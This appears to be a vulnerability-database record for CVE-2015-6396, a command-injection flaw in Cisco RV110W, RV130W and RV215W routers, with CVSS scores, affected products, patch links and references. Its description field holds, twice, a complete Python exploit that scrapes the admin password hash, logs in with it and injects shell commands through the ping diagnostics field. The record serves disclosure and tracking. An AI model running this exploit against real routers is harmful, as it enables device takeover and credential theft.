var-201608-0273
Vulnerability from variot
The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567. shell A command execution vulnerability exists. The Cisco RV110WRV130W and RV215W are Cisco router products. Multiple Cisco Products are prone to a local command-injection vulnerability. A local attacker can exploit this issue to execute arbitrary commands on the host operating system with root privileges. This issue being tracked by Cisco Bug IDs CSCuv90134, CSCux58161 and CSCux73567. The following products are affected: RV110W Wireless-N VPN Firewall RV130W Wireless-N Multifunction VPN Router RV215W Wireless-N VPN Router. #!/usr/bin/env python2
Cisco RV110W Password Disclosure and OS Command Execute.
Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)
Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
Date: 2018-08
Exploit Author: RySh
Vendor Homepage: https://www.cisco.com/
Version: 1.1.0.9
Tested on: RV110W 1.1.0.9
CVE : CVE-2014-0683, CVE-2015-6396
import os import sys import re import urllib import urllib2 import getopt import json
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
Usage: ./{script_name} 192.168.1.1 443 "reboot"
if name == "main": IP = argv[1] PORT = argv[2] CMD = argv[3]
# Get session key, Just access index page.
url = 'https://' + IP + ':' + PORT + '/'
req = urllib2.Request(url)
result = urllib2.urlopen(req)
res = result.read()
# parse 'admin_pwd'! -- Get credits
admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd
# Get session_id by POST
req2 = urllib2.Request(url + "login.cgi")
req2.add_header('Origin', url)
req2.add_header('Upgrade-Insecure-Requests', 1)
req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
req2.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req2.add_header('Referer', url)
req2.add_header('Accept-Encoding', 'gzip, deflate')
req2.add_header('Accept-Language', 'en-US,en;q=0.9')
req2.add_header('Cookie', 'SessionID=')
data = {"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": "0",
"change_action": "",
"enc": "1",
"user": admin_user,
"pwd": admin_pwd,
"sel_lang": "EN"
}
r = urllib2.urlopen(req2, urllib.urlencode(data))
resp = r.read()
login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
# Execute your commands via diagnose command parameter, default command is `reboot`
req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
req3.add_header('Origin', url)
req3.add_header('Upgrade-Insecure-Requests', 1)
req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
req3.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req3.add_header('Referer', url)
req3.add_header('Accept-Encoding', 'gzip, deflate')
req3.add_header('Accept-Language', 'en-US,en;q=0.9')
req3.add_header('Cookie', 'SessionID=')
data_cmd = {"submit_button": "Diagnostics",
"change_action": "gozila_cgi",
"submit_type": "start_ping",
"gui_action": "",
"traceroute_ip": "",
"commit": "1",
"ping_times": "3 |" + CMD + "|",
"ping_size": "64",
"wait_time": "4",
"ping_ip": "127.0.0.1",
"lookup_name": ""
}
r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201608-0273",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 1.2,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 1.2,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 1.2,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.0.3.16"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.2.1.7"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "BID",
"id": "92269"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "NVD",
"id": "CVE-2015-6396"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:cisco:rv110w_wireless-n_vpn_firewall_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:cisco:rv110w_wireless-n_vpn_firewall:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:cisco:rv130w_wireless-n_multifunction_vpn_router:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:cisco:rv215w_wireless-n_vpn_router:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-6396"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Adam Zielinski.",
"sources": [
{
"db": "BID",
"id": "92269"
}
],
"trust": 0.3
},
"cve": "CVE-2015-6396",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.2,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2015-6396",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2016-06162",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-84357",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2015-6396",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-6396",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2016-06162",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201608-173",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-84357",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "VULHUB",
"id": "VHN-84357"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "NVD",
"id": "CVE-2015-6396"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567. shell A command execution vulnerability exists. The Cisco RV110WRV130W and RV215W are Cisco router products. Multiple Cisco Products are prone to a local command-injection vulnerability. \nA local attacker can exploit this issue to execute arbitrary commands on the host operating system with root privileges. \nThis issue being tracked by Cisco Bug IDs CSCuv90134, CSCux58161 and CSCux73567. \nThe following products are affected:\nRV110W Wireless-N VPN Firewall\nRV130W Wireless-N Multifunction VPN Router\nRV215W Wireless-N VPN Router. #!/usr/bin/env python2\n\n#####\n## Cisco RV110W Password Disclosure and OS Command Execute. \n### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)\n\n# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute\n# Date: 2018-08\n# Exploit Author: RySh\n# Vendor Homepage: https://www.cisco.com/\n# Version: 1.1.0.9\n# Tested on: RV110W 1.1.0.9\n# CVE : CVE-2014-0683, CVE-2015-6396\n\nimport os\nimport sys\nimport re\nimport urllib\nimport urllib2\nimport getopt\nimport json\n\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n###\n# Usage: ./{script_name} 192.168.1.1 443 \"reboot\"\n###\n\nif __name__ == \"__main__\":\n IP = argv[1]\n PORT = argv[2]\n CMD = argv[3]\n \n # Get session key, Just access index page. \n url = \u0027https://\u0027 + IP + \u0027:\u0027 + PORT + \u0027/\u0027\n req = urllib2.Request(url)\n result = urllib2.urlopen(req)\n res = result.read()\n \n # parse \u0027admin_pwd\u0027! -- Get credits\n admin_user = re.search(r\u0027.*(.*admin_name=\\\")(.*)\\\"\u0027, res).group().split(\"\\\"\")[1]\n admin_pwd = re.search(r\u0027.*(.*admin_pwd=\\\")(.{32})\u0027, res).group()[-32:]\n print \"Get Cred. Username = \" + admin_user + \", PassHash = \" + admin_pwd\n\n # Get session_id by POST\n req2 = urllib2.Request(url + \"login.cgi\")\n req2.add_header(\u0027Origin\u0027, url)\n req2.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n req2.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n req2.add_header(\u0027User-Agent\u0027,\n \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n req2.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n req2.add_header(\u0027Referer\u0027, url)\n req2.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n req2.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n req2.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n data = {\"submit_button\": \"login\",\n \"submit_type\": \"\",\n \"gui_action\": \"\",\n \"wait_time\": \"0\",\n \"change_action\": \"\",\n \"enc\": \"1\",\n \"user\": admin_user,\n \"pwd\": admin_pwd,\n \"sel_lang\": \"EN\"\n }\n r = urllib2.urlopen(req2, urllib.urlencode(data))\n resp = r.read()\n login_st = re.search(r\u0027.*login_st=\\d;\u0027, resp).group().split(\"=\")[1]\n session_id = re.search(r\u0027.*session_id.*\\\";\u0027, resp).group().split(\"\\\"\")[1]\n\n # Execute your commands via diagnose command parameter, default command is `reboot`\n req3 = urllib2.Request(url + \"apply.cgi;session_id=\" + session_id)\n req3.add_header(\u0027Origin\u0027, url)\n req3.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n req3.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n req3.add_header(\u0027User-Agent\u0027,\n \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n req3.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n req3.add_header(\u0027Referer\u0027, url)\n req3.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n req3.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n req3.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n data_cmd = {\"submit_button\": \"Diagnostics\",\n \"change_action\": \"gozila_cgi\",\n \"submit_type\": \"start_ping\",\n \"gui_action\": \"\",\n \"traceroute_ip\": \"\",\n \"commit\": \"1\",\n \"ping_times\": \"3 |\" + CMD + \"|\",\n \"ping_size\": \"64\",\n \"wait_time\": \"4\",\n \"ping_ip\": \"127.0.0.1\",\n \"lookup_name\": \"\"\n }\n r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))\n \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-6396"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "BID",
"id": "92269"
},
{
"db": "VULHUB",
"id": "VHN-84357"
},
{
"db": "PACKETSTORM",
"id": "150781"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-6396",
"trust": 3.5
},
{
"db": "BID",
"id": "92269",
"trust": 2.0
},
{
"db": "EXPLOIT-DB",
"id": "45986",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1036528",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2016.1890",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2016-06162",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-84357",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "150781",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "VULHUB",
"id": "VHN-84357"
},
{
"db": "BID",
"id": "92269"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "PACKETSTORM",
"id": "150781"
},
{
"db": "NVD",
"id": "CVE-2015-6396"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
}
]
},
"id": "VAR-201608-0273",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "VULHUB",
"id": "VHN-84357"
}
],
"trust": 1.2307152499999998
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
}
]
},
"last_update_date": "2023-12-18T12:21:24.314000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20160803-rv110_130w1",
"trust": 0.8,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160803-rv110_130w1"
},
{
"title": "Patches for any command execution vulnerability in multiple Cisco products",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/80243"
},
{
"title": "Cisco RV110W , RV130W and RV215W Repair measures for device security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=63566"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84357"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "NVD",
"id": "CVE-2015-6396"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160803-rv110_130w1"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/92269"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/45986/"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1036528"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6396"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6396"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/render.html?it=37422"
},
{
"trust": 0.4,
"url": "http://www.cisco.com/"
},
{
"trust": 0.1,
"url": "https://\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0683"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-6396"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "VULHUB",
"id": "VHN-84357"
},
{
"db": "BID",
"id": "92269"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "PACKETSTORM",
"id": "150781"
},
{
"db": "NVD",
"id": "CVE-2015-6396"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "VULHUB",
"id": "VHN-84357"
},
{
"db": "BID",
"id": "92269"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "PACKETSTORM",
"id": "150781"
},
{
"db": "NVD",
"id": "CVE-2015-6396"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"date": "2016-08-08T00:00:00",
"db": "VULHUB",
"id": "VHN-84357"
},
{
"date": "2016-08-03T00:00:00",
"db": "BID",
"id": "92269"
},
{
"date": "2016-08-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"date": "2018-12-14T18:00:57",
"db": "PACKETSTORM",
"id": "150781"
},
{
"date": "2016-08-08T00:59:00.140000",
"db": "NVD",
"id": "CVE-2015-6396"
},
{
"date": "2016-08-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201608-173"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"date": "2018-12-15T00:00:00",
"db": "VULHUB",
"id": "VHN-84357"
},
{
"date": "2016-08-03T00:00:00",
"db": "BID",
"id": "92269"
},
{
"date": "2016-08-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"date": "2018-12-15T11:29:00.477000",
"db": "NVD",
"id": "CVE-2015-6396"
},
{
"date": "2016-08-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201608-173"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "92269"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Device product CLI Any command with administrator privileges in the command parser shell Command execution vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.